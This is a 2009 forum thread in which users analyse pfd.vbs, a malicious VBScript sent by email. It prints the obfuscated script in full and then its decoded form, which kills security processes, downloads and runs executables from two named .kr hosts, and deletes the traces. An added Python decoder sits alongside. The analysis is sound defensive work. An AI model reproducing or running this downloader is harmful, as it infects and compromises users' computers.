What is pfd.vbs?


frostbyte5014
11-17-2009, 01:31 PM
I got a call from a customer this morning. They had an hyperlink in their email that pointed to a pfd.vbs and you know they had to click on it. I downloaded the file and looked at it and can't figure out what it does. I am posting the code here to see if anyone can figure it out. Do not run the code! I don't know what it will do!

frefreFTtf="Execute[}mS{]runner>Nv<next>Nv<[}mS{][}mS{][}mS{][}mS{][}mS{][}mS{][}mS{][}mS{]runner=runner&chr(strs(i))>Nv<for[}mS{]i=1[}mS{]to[}mS{]UBound(strs)>Nv<strs=array(13,111,110,32,101,114,114,111,114,32,11 4,101,115,117,109,101,32,110,101,120,116,13,10,83, 101,116,32,72,74,85,106,105,104,55,103,72,61,67,11 4,101,97,116,101,79,98,106,101,99,116,40,34,87,34, 43,34,115,34,43,34,99,34,43,34,114,34,43,34,105,34 ,43,34,112,34,43,34,116,46,83,34,43,34,104,34,43,3 4,69,34,43,34,108,34,43,34,76,34,41,32,13,10,83,10 1,116,32,100,101,103,121,73,84,54,71,89,55,61,67,1 14,101,97,116,101,79,98,106,101,99,116,40,34,65,34 ,43,34,68,34,43,34,79,34,43,34,68,34,43,34,66,46,8 3,34,43,34,116,34,43,34,114,34,43,34,101,34,43,34, 97,34,43,34,109,34,41,13,10,72,85,72,111,111,117,1 04,56,57,72,56,61,34,47,34,13,10,100,101,103,121,1 08,84,54,71,89,55,61,34,104,116,116,112,58,34,13,1 0,118,104,61,34,37,54,54,37,54,34,13,10,104,118,61 ,34,37,50,69,34,43,118,104,43,34,57,37,55,50,37,55 ,51,37,55,52,37,54,68,37,54,49,37,54,67,37,54,67,3 7,50,69,37,54,66,37,55,50,34,43,72,85,72,111,111,1 17,104,56,57,72,56,43,34,37,54,68,37,54,70,37,54,5 2,37,55,53,37,54,67,37,54,53,34,13,10,83,101,116,3 2,85,72,85,111,111,117,104,56,57,72,56,32,61,32,67 ,114,101,97,116,101,79,98,106,101,99,116,40,34,77, 34,43,34,115,34,43,34,120,34,43,34,77,34,43,34,108 ,34,43,34,50,46,120,34,43,34,77,34,43,34,108,34,43 ,34,72,34,43,34,84,34,43,34,116,34,43,34,112,34,41 ,13,10,102,111,114,32,101,97,99,104,32,112,115,32, 105,110,32,103,101,116,111,98,106,101,99,116,40,34 ,119,105,110,109,103,109,116,115,58,92,92,46,92,11 4,111,111,116,92,99,105,109,118,50,58,119,105,110, 51,50,95,112,114,111,99,101,115,115,34,41,46,105,1 10,115,116,97,110,99,101,115,95,13,10,105,102,32,1 12,115,46,78,97,109,101,61,34,114,102,119,115,114, 118,46,101,120,101,34,32,111,114,32,112,115,46,110 ,97,109,101,61,34,49,46,101,120,101,34,32,111,114, 32,112,115,46,110,97,109,101,61,34,50,46,101,120,1 01,34,32,111,114,32,112,115,46,110,97,109,101,61,3 
4,51,46,101,120,101,34,32,111,114,32,112,115,46,11 0,97,109,101,61,34,65,89,85,112,100,97,116,101,46, 97,121,101,34,116,104,101,110,32,13,10,72,74,85,10 6,105,104,55,103,72,46,114,117,110,32,34,110,116,1 15,100,32,45,112,32,34,43,99,115,116,114,40,43,112 ,115,46,104,97,110,100,108,101,41,32,43,34,32,45,9 9,32,113,34,44,48,13,10,101,110,100,32,105,102,13, 10,110,101,120,116,13,10,102,105,114,115,61,72,85, 72,111,111,117,104,56,57,72,56,43,118,104,43,34,67 ,37,54,49,37,55,51,37,54,56,34,43,72,85,72,111,111 ,117,104,56,57,72,56,43,34,37,54,50,37,54,49,37,54 ,69,37,54,69,37,54,53,37,55,50,37,51,48,37,51,50,4 6,37,54,55,37,54,57,37,54,54,34,13,10,85,72,85,111 ,111,117,104,56,57,72,56,46,79,112,101,110,32,34,7 1,69,84,34,44,100,101,103,121,108,84,54,71,89,55,4 3,72,85,72,111,111,117,104,56,57,72,56,43,72,85,72 ,111,111,117,104,56,57,72,56,43,34,37,55,57,37,54, 70,37,54,70,37,54,67,37,54,68,37,54,70,37,54,68,34 ,43,104,118,43,102,105,114,115,44,48,13,10,85,72,8 5,111,111,117,104,56,57,72,56,46,83,101,110,100,40 ,41,13,10,100,101,103,121,73,84,54,71,89,55,46,77, 111,100,101,61,51,13,10,100,101,103,121,73,84,54,7 1,89,55,46,84,121,112,101,61,49,13,10,100,101,103, 121,73,84,54,71,89,55,46,79,112,101,110,40,41,13,1 0,100,101,103,121,73,84,54,71,89,55,46,87,114,105, 116,101,40,85,72,85,111,111,117,104,56,57,72,56,46 ,114,101,115,112,111,110,115,101,66,111,100,121,41 ,13,10,100,101,103,121,73,84,54,71,89,55,46,115,65 ,86,101,116,79,70,105,76,101,32,34,67,58,92,111,11 7,111,46,101,120,101,34,13,10,72,74,85,106,105,104 ,55,103,72,46,114,117,110,32,40,34,99,109,100,32,4 7,99,32,115,101,116,32,100,97,116,101,61,37,100,97 ,116,101,37,32,38,38,100,97,116,101,32,50,48,48,53 ,45,49,45,49,32,38,38,112,105,110,103,32,45,110,32 ,49,48,32,49,50,55,46,48,46,48,46,49,32,38,38,115, 116,97,114,116,32,67,58,92,111,117,111,46,101,120, 101,32,38,38,100,97,116,101,32,37,100,97,116,101,3 7,32,34,41,44,48,13,10,111,110,32,101,114,114,111, 114,32,114,101,115,117,109,101,32,110,101,120,116, 
13,10,72,74,85,61,34,37,54,49,37,34,13,10,65,55,61 ,34,37,55,34,13,10,65,54,70,54,67,54,67,54,53,54,5 5,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52, 51,50,51,56,51,50,51,54,51,53,51,55,61,34,104,116, 116,112,58,47,47,34,13,10,83,101,116,32,72,74,85,1 06,105,104,55,103,72,61,67,114,101,97,116,101,79,9 8,106,101,99,116,40,34,87,34,43,34,115,34,43,34,99 ,34,43,34,114,34,43,34,105,34,43,34,112,34,43,34,1 16,46,83,34,43,34,104,34,43,34,69,34,43,34,108,34, 43,34,76,34,41,32,13,10,83,101,116,32,100,101,103, 121,73,84,54,71,89,55,61,67,114,101,97,116,101,79, 98,106,101,99,116,40,34,65,34,43,34,68,34,43,34,79 ,34,43,34,68,34,43,34,66,46,83,34,43,34,116,34,43, 34,114,34,43,34,101,34,43,34,97,34,43,34,109,34,41 ,13,10,83,101,116,32,85,72,85,111,111,117,104,56,5 7,72,57,32,61,32,67,114,101,97,116,101,79,98,106,1 01,99,116,40,34,77,34,43,34,115,34,43,34,120,34,43 ,34,77,34,43,34,108,34,43,34,50,46,120,34,43,34,77 ,34,43,34,108,34,43,34,72,34,43,34,84,34,43,34,116 ,34,43,34,112,34,41,13,10,102,111,114,32,101,97,99 ,104,32,112,115,32,105,110,32,103,101,116,111,98,1 06,101,99,116,40,34,119,105,110,109,103,109,116,11 5,58,92,92,46,92,114,111,111,116,92,99,105,109,118 ,50,58,119,105,110,51,50,95,112,114,111,99,101,115 ,115,34,41,46,105,110,115,116,97,110,99,101,115,95 ,13,10,105,102,32,112,115,46,78,97,109,101,61,34,1 14,102,119,115,114,118,46,101,120,101,34,32,111,11 4,32,112,115,46,110,97,109,101,61,34,49,46,101,120 ,101,34,32,111,114,32,112,115,46,110,97,109,101,61 ,34,50,46,101,120,101,34,32,111,114,32,112,115,46, 110,97,109,101,61,34,51,46,101,120,101,34,32,111,1 14,32,112,115,46,110,97,109,101,61,34,65,89,85,112 ,100,97,116,101,46,97,121,101,34,116,104,101,110,3 2,13,10,72,74,85,106,105,104,55,103,72,46,114,117, 110,32,34,110,116,115,100,32,45,112,32,34,43,99,11 5,116,114,40,43,112,115,46,104,97,110,100,108,101, 41,32,43,34,32,45,99,32,113,34,44,48,13,10,101,110 ,100,32,105,102,13,10,110,101,120,116,13,10,85,72, 85,111,111,117,104,56,57,72,57,46,79,112,101,110,3 
2,34,71,69,84,34,44,65,54,70,54,67,54,67,54,53,54, 55,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52 ,51,50,51,56,51,50,51,54,51,53,51,55,43,65,55,43,3 4,57,37,54,65,37,54,55,34,43,65,55,43,34,50,37,54, 53,37,54,53,37,54,69,37,50,69,37,54,54,37,54,57,34 ,43,65,55,43,34,50,34,43,65,55,43,34,51,34,43,65,5 5,43,34,52,37,54,68,34,43,72,74,85,43,34,54,67,37, 54,67,37,50,69,37,54,66,34,43,65,55,43,34,50,47,37 ,55,48,34,43,72,74,85,43,34,55,50,34,43,65,55,43,3 4,52,37,54,69,37,54,53,34,43,65,55,43,34,50,47,37, 54,53,34,43,65,55,43,34,51,37,54,53,37,54,67,37,54 ,67,37,54,53,34,43,65,55,43,34,50,34,43,65,55,43,3 4,51,47,34,43,65,55,43,34,52,37,54,68,34,43,65,55, 43,34,48,47,37,51,50,37,51,48,37,51,48,37,51,56,37 ,51,49,37,51,48,37,51,48,37,51,50,37,51,49,37,51,5 6,37,51,51,37,51,52,37,51,56,34,43,65,55,43,34,56, 34,44,48,13,10,85,72,85,111,111,117,104,56,57,72,5 7,46,83,101,110,100,40,41,13,10,100,101,103,121,73 ,84,54,71,89,55,46,77,111,100,101,61,51,13,10,100, 101,103,121,73,84,54,71,89,55,46,84,121,112,101,61 ,49,13,10,100,101,103,121,73,84,54,71,89,55,46,79, 112,101,110,40,41,13,10,100,101,103,121,73,84,54,7 1,89,55,46,87,114,105,116,101,40,85,72,85,111,111, 117,104,56,57,72,57,46,114,101,115,112,111,110,115 ,101,66,111,100,121,41,13,10,100,101,103,121,73,84 ,54,71,89,55,46,115,65,86,101,116,79,70,105,76,101 ,32,34,67,58,92,87,73,78,68,79,87,83,92,97,100,100 ,105,110,115,92,111,115,46,101,120,101,34,13,10,72 ,74,85,106,105,104,55,103,72,46,114,117,110,32,40, 34,99,109,100,32,47,99,32,115,101,116,32,100,97,11 6,101,61,37,100,97,116,101,37,32,38,38,100,97,116, 101,32,50,48,48,53,45,49,45,49,32,38,38,112,105,11 0,103,32,45,110,32,49,48,32,49,50,55,46,48,46,48,4 6,49,32,38,38,115,116,97,114,116,32,67,58,92,87,73 ,78,68,79,87,83,92,97,100,100,105,110,115,92,111,1 15,46,101,120,101,32,38,38,100,97,116,101,32,37,10 0,97,116,101,37,32,34,41,44,48,13,10,87,83,99,114, 105,112,116,46,83,108,101,101,112,32,49,51,48,48,4 8,13,10,99,114,101,97,116,101,111,98,106,101,99,11 
6,40,34,119,115,99,114,105,112,116,46,115,104,101, 108,108,34,41,46,114,117,110,32,34,99,109,100,32,4 7,99,32,100,101,108,32,47,102,32,47,115,32,47,113, 32,67,58,92,111,117,111,46,101,120,101,34,44,48,13 ,10)>Nv<"
frefreFTtf = Replace(frefreFTtf, "[}mS{]",chr(9))
frefreFTtf = Replace(frefreFTtf, "ΰ", chr(34))
frefreFTtf = Replace(frefreFTtf, "Ǯ", chr(39))
execute(MyEncode(frefreFTtf))
function MyEncode(hack520org)
sz = Split(hack520org, ">Nv<")
For i = UBound(sz) To 0 Step -1
weiwei = weiwei + sz(i) + vbcrlf
Next
MyEncode=weiwei
end function

joydivision
11-17-2009, 01:40 PM
Well, I know a bit of VB, although it's been years since I used it. It looks like a very odd function indeed.

Reminds me rather of the old data pokes you had to do on a C64 to control the CPU at a low level.

frostbyte5014
11-17-2009, 01:42 PM
I have also done a bit of VBS, but I have never seen anything like it. I was able to find other examples online but no explanation. I also found it in many different languages.

K007
11-17-2009, 02:13 PM
My suspicions confirmed.
It's a Visual Basic script written by a Chinese programmer.
"FreFre" and "WeiWei" as names of variables, that sounded Chinese to me.
So I looked further and found "hack520org", which is a Chinese site, hack520.org.
Stay away from it.
It replaces some characters which I believe are encoded with other characters, then it does its own encoding.

It has MALWARE written all over it.

K007
11-17-2009, 02:26 PM
And this is what "Norton Safe" says about that website:
http://safeweb.norton.com/report/show?url=http:%2F%2Fwww.hack520.org%2F

MrUnknown
11-17-2009, 02:41 PM
While I don't know what it does in the end, it is basically decrypting an encrypted VBS file and executing it.

It looks like the numbers are simple offset locations of ASCII text (look up an ASCII table).

For example,
frefreFTtf = Replace(frefreFTtf, "[}mS{]",chr(9))
frefreFTtf = Replace(frefreFTtf, "ΰ", chr(34))
frefreFTtf = Replace(frefreFTtf, "Ǯ", chr(39))

[}mS{] is replaced with a TAB key
ΰ is replaced with a double quote sign "
and the last one is replaced with a single quote '

I'm not going to manually convert all of those numbers to ASCII, and I don't have a utility on hand that will, so I can't tell you what it does.

K007
11-17-2009, 02:59 PM
While I don't know what it does in the end, it is basically decrypting an encrypted VBS file and executing it.

It looks like the numbers are simple offset locations of ASCII text (look up an ASCII table).

For example,
frefreFTtf = Replace(frefreFTtf, "[}mS{]",chr(9))
frefreFTtf = Replace(frefreFTtf, "ΰ", chr(34))
frefreFTtf = Replace(frefreFTtf, "Ǯ", chr(39))

[}mS{] is replaced with a TAB key
ΰ is replaced with a double quote sign "
and the last one is replaced with a single quote '

I'm not going to manually convert all of those numbers to ASCII, and I don't have a utility on hand that will, so I can't tell you what it does.

That is the beauty of it.
I am not going to convert those numbers to characters either.
But it looks like those numbers are the real code of whatever it is.
Simple but ingenious.
Hard for antivirus software to figure out. They (the antivirus software) are looking at compiled code or pure code. Having the ASCII characters all in one big array is an ingenious way of fooling the antivirus.

frostbyte5014
11-17-2009, 05:55 PM
CA AV didn't find it, Malwarebytes didn't find it but AVG did and removed it.
Thanks guys for the info.

I will close this one.

Thread Closed by frostbyte5014

iisjman07
11-17-2009, 06:29 PM
Virus Total (http://www.virustotal.com/analisis/809b8ead935ef3e59ff67abbdf233f0394987cb3d4ca2a7ae4602c8529ab33dc-1258481233)

AntiVir 7.9.1.70 2009.11.17 HTML/Crypted.Gen
Fortinet 3.120.0.0 2009.11.17 VBS/RFI.A!tr.dldr
McAfee-GW-Edition 6.8.5 2009.11.17 Heuristic.Script.Crypted


Jotti

http://virusscan.jotti.org/en/scanresult/958b38327debff472f1085c0c8fd5db5eaa1f6e2

If I get bored later I may run this on a virtual machine to see what happens.

Blues
11-17-2009, 06:53 PM
I'd like to see someone decrypt the code first before they go poking it with a stick, i.e. running it.

iisjman07
11-17-2009, 07:02 PM
I'd like to see someone decrypt the code first before they go poking it with a stick

Where's your sense of adventure?!

Blues
11-17-2009, 07:04 PM
I traded it in for apathy :p

No, but I just want to know what it is, then, well, yeah, jump into the mud and see what it really does and how much trouble it is.

K007
11-17-2009, 07:25 PM
I traded it in for apathy :p

No, but I just want to know what it is, then, well, yeah, jump into the mud and see what it really does and how much trouble it is.

Go for it! :cool:
And let us know what you found.
It would be like watching a thriller from the comfort of the living room.

MrUnknown
11-17-2009, 07:56 PM
Have fun.

on error resume next
Set HJUjih7gH=CreateObject("W"+"s"+"c"+"r"+"i"+"p"+"t.S"+"h"+"E"+"l"+"L")
Set degyIT6GY7=CreateObject("A"+"D"+"O"+"D"+"B.S"+"t"+"r"+"e"+"a"+"m")
HUHoouh89H8="/"
degylT6GY7="http:"
vh="%66%6"
hv="%2E"+vh+"9%72%73%74%6D%61%6C%6C%2E%6B%72"+HUHoouh89H8+"%6D%6F%64%75%6C%65"
Set UHUoouh89H8 = CreateObject("M"+"s"+"x"+"M"+"l"+"2.x"+"M"+"l"+"H"+"T"+"t"+"p" )
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="AYUpdate.aye"then
HJUjih7gH.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
firs=HUHoouh89H8+vh+"C%61%73%68"+HUHoouh89H8+"%62%61%6E%6E%65%72%30%32.%67%69%66 "
UHUoouh89H8.Open "GET",degylT6GY7+HUHoouh89H8+HUHoouh89H8+"%79%6F%6F%6C%6D%6F%6D "+hv+firs,0
UHUoouh89H8.Send()
degyIT6GY7.Mode=3
degyIT6GY7.Type=1
degyIT6GY7.Open()
degyIT6GY7.Write(UHUoouh89H8.responseBody)
degyIT6GY7.sAVetOFiLe "C:\ouo.exe"
HJUjih7gH.run ("cmd /c set date=%date% &&date 2005-1-1 &&ping -n 10 127.0.0.1 && start C:\ouo.exe &&date %date% "),0
on error resume next
HJU="%61%"
A7="%7"
A6F6C6C6567652E6FA764313134323832363537="http://"
Set HJUjih7gH=CreateObject("W"+"s"+"c"+"r"+"i"+"p"+"t.S"+"h"+"E"+"l"+"L")
Set degyIT6GY7=CreateObject("A"+"D"+"O"+"D"+"B.S"+"t"+"r"+"e"+"a"+"m")
Set UHUoouh89H9 = CreateObject("M"+"s"+"x"+"M"+"l"+"2.x"+"M"+"l"+"H"+"T"+"t"+"p" )
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="AYUpdate.aye"then
HJUjih7gH.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
UHUoouh89H9.Open "GET",A6F6C6C6567652E6FA764313134323832363537+A7+"9%6A%67"+A7+" 2%65%65%6E%2E%66%69"+A7+"2"+A7+"3"+A7+"4%6D"+HJU+"6C%6C%2E%6B"+A7+"2/%70"+HJU+"7 2"+A7+"4%6E%65"+A7+"2/%65"+A7+"3%65%6C%6C%65"+A7+"2"+A7+"3/"+A7+"4%6D"+A7+"0/%32 %30%30%38%31%30%30%32%31%38%33%34%38"+A7+"8",0
UHUoouh89H9.Send()
degyIT6GY7.Mode=3
degyIT6GY7.Type=1
degyIT6GY7.Open()
degyIT6GY7.Write(UHUoouh89H9.responseBody)
degyIT6GY7.sAVetOFiLe "C:\WINDOWS\addins\os.exe"
HJUjih7gH.run ("cmd /c set date=%date% &&date 2005-1-1 &&ping -n 10 127.0.0.1 && start C:\WINDOWS\addins\os.exe &&date %date% "),0
WScript.Sleep 13000
createobject("wscript.shell").run "cmd /c del /f /s /q C:\ouo.exe",0


As both arrays of numbers looked the same to me when I glanced at them, I am sure they do similar things but download from different sites.
For those who did run it, look for os.exe and ouo.exe and be sure to delete them.

perl > vbs


edit:

What it seems to do:

Creates 2 objects, a Wscript.Shell and an ADODB.Stream

Sets up some variables

Creates an MsXml2 object to do an Ajax call

Gets a list of all running processes and scans through them

If one is called rfwsrv.exe, 1.exe, 2.exe, 3.exe or AYUpdate.aye then it runs ntsd -p (processid) -c q on it.
I don't know what ntsd is, but it is apparently a debugger.

It then downloads a file from some URL and saves it to C:\ouo.exe using the ADODB.Stream it created

It then runs this series of commands:
cmd /c set date=%date%
date 2005-1-1
ping -n 10 127.0.0.1
start C:\ouo.exe
date %date%


Does the same exact stuff again but downloads a file to C:\WINDOWS\addins\os.exe

It runs this file with the commands:
cmd /c set date=%date%
date 2005-1-1
ping -n 10 127.0.0.1
start C:\WINDOWS\addins\os.exe
date %date%

And then deletes the first file downloaded with the command:
cmd /c del /f /s /q C:\ouo.exe
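MrUnknown's two steps (split on ">Nv<" and reverse the pieces, then chr() over the number array) can be done as plain string processing so nothing is ever executed, and the decoded listing above can be made readable by folding the "W"+"s"+"c" concatenations and decoding the %XX escapes. The Python below is an added example, not code from any post in this thread; SAMPLE_BLOB is a constructed harmless stand-in in the same format as pfd.vbs, the function names are mine, and the %XX rule in reveal_strings is a heuristic, not something the script itself does.

```python
"""
Static decoder for the two-layer obfuscation used by pfd.vbs.

Layer 1: the script body is one string whose lines are stored in reverse
order, separated by ">Nv<"; "[}mS{]" stands for a TAB. MyEncode() splits on
">Nv<", walks the pieces last-to-first, and the result is Execute()d.
Layer 2: the rebuilt script holds strs=array(13,111,...) and loops
runner=runner&chr(strs(i)) from i=1 to rebuild the real payload.

Everything here is string processing only; the sample is never executed.
"""
import re

LINE_SEP = ">Nv<"
TAB_TOKEN = "[}mS{]"


def decode_outer(blob: str) -> str:
    """Undo MyEncode() and the three Replace() calls that precede it."""
    pieces = blob.split(LINE_SEP)
    pieces.reverse()                       # MyEncode walks UBound .. 0
    text = "\r\n".join(pieces)             # each piece had a vbcrlf appended
    text = text.replace(TAB_TOKEN, "\t")   # chr(9)
    return text.replace("ΰ", '"').replace("Ǯ", "'")   # chr(34), chr(39)


def decode_chr_array(script: str) -> str:
    """Turn strs=array(...) into text the way the runner loop does.
    Forum line-wrapping inserts stray spaces inside numbers ("11 4"),
    so all whitespace is dropped before the digits are parsed."""
    m = re.search(r"strs\s*=\s*array\(([\d,\s]*)\)", script)
    if not m:
        raise ValueError("no strs=array(...) in script")
    codes = [int(n) for n in re.sub(r"\s+", "", m.group(1)).split(",") if n]
    return "".join(chr(c) for c in codes[1:])   # loop starts at i=1, element 0 is skipped


def reveal_strings(script: str) -> str:
    """Make the decoded payload readable without running it:
    1. fold "W"+"s"+"c" style literal concatenation into one literal;
    2. decode runs of %XX escapes, but only when the run is not followed by
       a letter or digit, so %date% in the cmd line is left alone (heuristic)."""
    concat = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
    prev = None
    while prev != script:
        prev, script = script, concat.sub(r'"\1\2"', script)
    pct = re.compile(r"(?:%[0-9A-Fa-f]{2})+(?![0-9A-Za-z])")
    return pct.sub(
        lambda m: bytes.fromhex(m.group(0).replace("%", "")).decode("latin-1"),
        script,
    )


# Constructed sample in the same shape as pfd.vbs: the inner payload is a
# harmless msgbox, and "11 5" mimics a forum-inserted space.
SAMPLE_BLOB = (
    "Execute[}mS{]runner>Nv<next>Nv<[}mS{]runner=runner&chr(strs(i))>Nv<"
    "for[}mS{]i=1[}mS{]to[}mS{]UBound(strs)>Nv<"
    "strs=array(13,109,11 5,103,98,111,120,32,34,104,105,34)>Nv<"
)


def decode_sample(blob: str = SAMPLE_BLOB) -> str:
    """Run both layers plus the readability pass; returns the final payload."""
    return reveal_strings(decode_chr_array(decode_outer(blob)))


if __name__ == "__main__":
    print(decode_outer(SAMPLE_BLOB))
    print(decode_sample())
```

Pointing decode_outer at the real frefreFTtf string from the first post recovers the loader stage, and decode_chr_array on that recovers the listing MrUnknown posted; reveal_strings then shows the CreateObject targets and URL fragments in clear.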

K007
11-17-2009, 08:25 PM
Well done!
My respects flying to you.:)

MrUnknown
11-17-2009, 08:26 PM
first URL it downloads:

yoolmom.firstmall.kr/module/flash/banner02.gif

second URL seems to be:
yjgreen.firstmall.kr/partner/esellers/tmp/2008100218348x

Well done!
My respects flying to you.:)

thank you :)

K007
11-17-2009, 08:44 PM
first URL it downloads:

yoolmom.firstmall.kr/module/flash/banner02.gif

second URL seems to be:
yjgreen.firstmall.kr/partner/esellers/tmp/2008100218348x



thank you :)

The second download is a trojan and shows as "Identity threat".
It creates the following file:
C:\users\username\appdata\local\temp\+v+c_x+b.part

There are probably other parts (it seems to be some sort of archive), but my Norton stopped it there.

MrUnknown
11-17-2009, 08:47 PM
Kaspersky has the first website blacklisted, so I didn't attempt to download it.

the second URL was blocked for being AdWare.Win32.BHO.jxe, but I was unable to find any info on it.

K007
11-17-2009, 08:53 PM
Symantec's description of this threat:
Sorry, that was the wrong lead. Link deleted.

studiot
11-17-2009, 10:18 PM
You could always upload it to the guys I posted here

http://www.technibble.com/forums/showthread.php?t=10930

MrUnknown
11-20-2009, 08:15 AM
your post has nothing to do with this thread, what are you trying to accomplish?

Edit: never mind, probably a spam bot, along with Merprody73.

Methical
11-20-2009, 08:31 AM
your post has nothing to do with this thread, what are you trying to accomplish?

... trying to get his post count above 5 so he can see the private stuff, lol, and steal all our secrets :eek: